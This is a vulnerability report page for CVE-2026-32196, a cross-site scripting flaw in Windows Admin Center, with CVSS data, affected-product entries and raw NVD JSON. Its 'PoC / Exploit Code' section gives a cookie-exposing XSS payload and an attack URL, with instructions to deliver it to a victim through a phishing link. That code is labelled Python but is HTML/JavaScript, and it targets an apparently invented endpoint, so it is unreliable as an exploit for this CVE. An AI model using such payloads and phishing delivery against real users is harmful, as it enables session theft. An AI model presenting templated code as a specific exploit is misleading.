Security Vulnerability Report
中文
CVE-2026-32196 CVSS 6.1 MEDIUM

CVE-2026-32196

Published: 2026-04-14 18:17:26
Last Modified: 2026-04-28 12:21:18

Description

Improper neutralization of input during web page generation ('cross-site scripting') in Windows Admin Center allows an unauthorized attacker to perform spoofing over a network.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:microsoft:windows_admin_center:*:*:*:*:*:*:*:* - VULNERABLE
Windows Admin Center (2026年4月安全更新前版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Proof of Concept (PoC) for CVE-2026-32196 Description: This payload demonstrates how an attacker might inject a script via a vulnerable parameter in Windows Admin Center. Usage: Encode the payload and send it to a victim via a phishing link. --> <script> // Step 1: Define the malicious JavaScript payload // In a real attack, this could be a keylogger or a beacon to an external server var payload = "<img src=x onerror=alert('CVE-2026-32196 XSS Executed - ' + document.cookie)>"; // Step 2: Simulate the vulnerable endpoint parameter injection // Example: https://<target-wac-host>/manage/page?setting=<payload> // Note: URL encoding is required for the payload to be transmitted correctly var encodedPayload = encodeURIComponent(payload); var attackUrl = "https://target-windows-admin-center/vulnerable_endpoint?config=" + encodedPayload; // Step 3: Output the constructed attack URL for demonstration console.log("[+] Generated Attack URL:"); console.log(attackUrl); // The vulnerability triggers when the victim loads the URL and the application reflects 'payload' without sanitization. </script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32196", "sourceIdentifier": "[email protected]", "published": "2026-04-14T18:17:26.060", "lastModified": "2026-04-28T12:21:17.930", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper neutralization of input during web page generation ('cross-site scripting') in Windows Admin Center allows an unauthorized attacker to perform spoofing over a network."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:windows_admin_center:*:*:*:*:*:*:*:*", "versionEndExcluding": "2511", "matchCriteriaId": "6E6B16F7-D308-4FCC-B230-6AFFB020AFE4"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32196", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}